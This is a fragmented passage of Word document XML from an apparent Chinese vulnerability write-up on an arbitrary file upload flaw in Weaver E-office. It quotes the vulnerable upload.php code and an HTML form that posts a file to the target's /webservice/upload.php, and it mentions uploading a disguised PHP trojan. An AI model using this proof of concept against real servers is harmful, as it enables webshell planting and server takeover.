      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>上传一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> jpg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的图片木马，即上传成功为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> xx.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="51"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的马。</w:t>
      </w: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rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>泛微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Eoffice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>任意文件上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>传</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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Bear baby</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="26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9227" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:17.6pt;width:337.5pt;height:311.65pt;z-index:476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include_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>once(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> "inc/utility_all.php" );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 xml:space="preserve">$pathInfor = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>pathinfo(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $_FILES['file']['tmp_name'] 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$extension = $</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>pathInfor[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'extension'];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$role = UPLOADROLE;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573"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$attachmentID = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>createfiledir(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ); global $ATTACH_PATH;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="2332"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$path = $ATTACH_PATH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attachmentID; if ( !file_exists( $path ) )</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2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mkdir(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $path, 448 );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$attachmentName = $_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>FILES[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'file']['tmp_name'];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$fileName = $path."/"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_FILES['file']['name'];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765"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$fileName = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>iconv(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> "UTF-8", "GBK", $fileName ); move_uploaded_file( $_FI</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>LES['file']['tmp_name'],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fileName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 !file_exists( $fileName ) )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 w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件位置：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>/webservice/upload.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。相关代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：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4"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="7"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="229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9165" style="width:338pt;height:165.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6760,3309">
            <v:rect id="_x0000_s9226" style="position:absolute;left:8;top:8;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9225" style="position:absolute;left:188;top:250;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9224" style="position:absolute" from="3,5" to="6757,5" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9223" style="position:absolute" from="5,3" to="5,513" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9222" style="position:absolute" from="6755,7" to="6755,514" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9221" style="position:absolute;left:8;top:513;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9220" style="position:absolute;left:188;top:577;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9219" style="position:absolute;left:1104;top:577;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9218" style="position:absolute;left:2020;top:577;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9217" style="position:absolute;left:2936;top:577;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9216" style="position:absolute;left:3852;top:577;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9215" style="position:absolute;left:4334;top:577;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9214" style="position:absolute;left:4454;top:577;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9213" style="position:absolute" from="5,513" to="5,839" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9212" style="position:absolute" from="6755,513" to="6755,839" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9211" style="position:absolute;left:8;top:839;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9210" style="position:absolute;left:188;top:903;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9209" style="position:absolute" from="5,839" to="5,1165" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9208" style="position:absolute" from="6755,839" to="6755,1165" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9207" style="position:absolute;left:8;top:1166;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9206" style="position:absolute;left:188;top:1228;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9205" style="position:absolute" from="5,1166" to="5,1492" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9204" style="position:absolute" from="6755,1166" to="6755,1492" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9203" style="position:absolute;left:8;top:1491;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9202" style="position:absolute;left:188;top:1554;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9201" style="position:absolute;left:308;top:1554;width:796;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9200" style="position:absolute;left:1104;top:1554;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9199" style="position:absolute;left:2020;top:1554;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9198" style="position:absolute;left:2936;top:1554;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9197" style="position:absolute;left:3852;top:1554;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9196" style="position:absolute;left:4334;top:1554;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9195" style="position:absolute;left:4454;top:1554;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9194" style="position:absolute" from="5,1491" to="5,1817" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9193" style="position:absolute" from="6755,1491" to="6755,1817" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9192" style="position:absolute;left:8;top:1818;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9191" style="position:absolute;left:188;top:1881;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9190" style="position:absolute;left:1104;top:1881;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9189" style="position:absolute;left:2020;top:1881;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9188" style="position:absolute;left:2936;top:1881;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9187" style="position:absolute;left:3852;top:1881;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9186" style="position:absolute;left:4334;top:1881;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9185" style="position:absolute" from="5,1818" to="5,2143" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9184" style="position:absolute" from="6755,1818" to="6755,2143" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9183" style="position:absolute;left:8;top:2144;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9182" style="position:absolute;left:188;top:2206;width:5061;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9181" style="position:absolute" from="5,2144" to="5,2470" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9180" style="position:absolute" from="6755,2144" to="6755,2470" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9179" style="position:absolute;left:8;top:2469;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9178" style="position:absolute;left:188;top:2533;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9177" style="position:absolute" from="5,2469" to="5,2795" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9176" style="position:absolute" from="6755,2469" to="6755,2795" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s9175" style="position:absolute;left:8;top:2795;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s9174" style="position:absolute;left:188;top:2859;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s9173" style="position:absolute" from="3,3304" to="6757,3304" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9172" style="position:absolute" from="5,2795" to="5,3306" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s9171" style="position:absolute" from="6755,2795" to="6755,3306" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:shape id="_x0000_s9170" type="#_x0000_t202" style="position:absolute;left:189;top:252;width:120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9169" type="#_x0000_t202" style="position:absolute;left:3851;top:578;width:1565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right="-17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  <w:r>
                      <w:rPr>
                        <w:color w:val="333333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"false";</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s9168" type="#_x0000_t202" style="position:absolute;left:189;top:902;width:480;height:852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else</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="200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9167" type="#_x0000_t202" style="position:absolute;left:3851;top:1555;width:1805;height:526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right="-17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$fileName;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="200" w:lineRule="exact"/>
                      <w:ind w:right="-17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</w:p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
            <v:shape id="_x0000_s9166" type="#_x0000_t202" style="position:absolute;left:189;top:2208;width:5059;height:850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$attachmentID."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*"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.$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_FILES['file']['name'];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 w:line="200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?&gt;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pStyle w:val="a3"/>
        <w:spacing w:line="225" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s9164" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:14.55pt;width:337.5pt;height:50.85pt;z-index:493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$path = $ATTACH_PATH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attachmentID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$fileName = $path."/"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_FILES['file']['name'];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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>没有做任何限制直接上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，文件名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原文件名，文件路径如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN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9163" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.2pt;width:337.5pt;height:99.75pt;z-index:496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2"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho"/>
                      <w:sz w:val="13"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="4476"/>
                    </w:tabs>
                    <w:spacing w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="463"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;form actio</w:t>
                  </w:r>
                  <w:hyperlink r:id="rId58">
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                      </w:rPr>
                      <w:t>n="http://</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:color w:val="333333"/>
                      </w:rPr>
                      <w:t>网站地址</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                      </w:rPr>
                      <w:t>/webservice/upload.php</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>" form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enctype="multipart/form-data"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>method="POST"&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="42"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>&lt;input name="file" type="file"&gt;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&lt;input name="" type="submit"&gt;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&lt;/form&gt;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构造上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下：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9"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="24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9162" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:18.3pt;width:337.5pt;height:148.65pt;z-index:498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createFileDir( )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global</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $ATTACH_PATH;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mt_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>srand(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ( double )microtime( ) * 1000000 );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-6"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$RADOM_ID = mt_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>rand(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ) +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mt_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>rand(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> 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 w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件位置：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">inc/jquery/uploadify/uploadify.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId59"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1120" w:left="1380" w:header="0" w:footer="938" w:gutter="0"/>
          <w:pgNumType w:start="11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tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="2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6595"/>
        <w:gridCol w:w="155"/>
        <w:gridCol w:w="1614"/>
      </w:tblGrid>
      <w:tr w:rsidR="00292EF3">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="2528"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CCCCCC"/>
              <w:left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292EF3">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="2"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0"/>
              <w:ind w:left="2471" w:right="1290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if</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126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( !file_exists( $ATTACH_PATH.$RADOM_ID ) )</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="124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{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126"/>
              <w:ind w:left="0" w:right="1260"/>
              <w:jc w:val="right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5"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126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$RADOM_ID;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126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  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="126"/>
              <w:ind w:left="2711" w:right="1290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else</w:t>
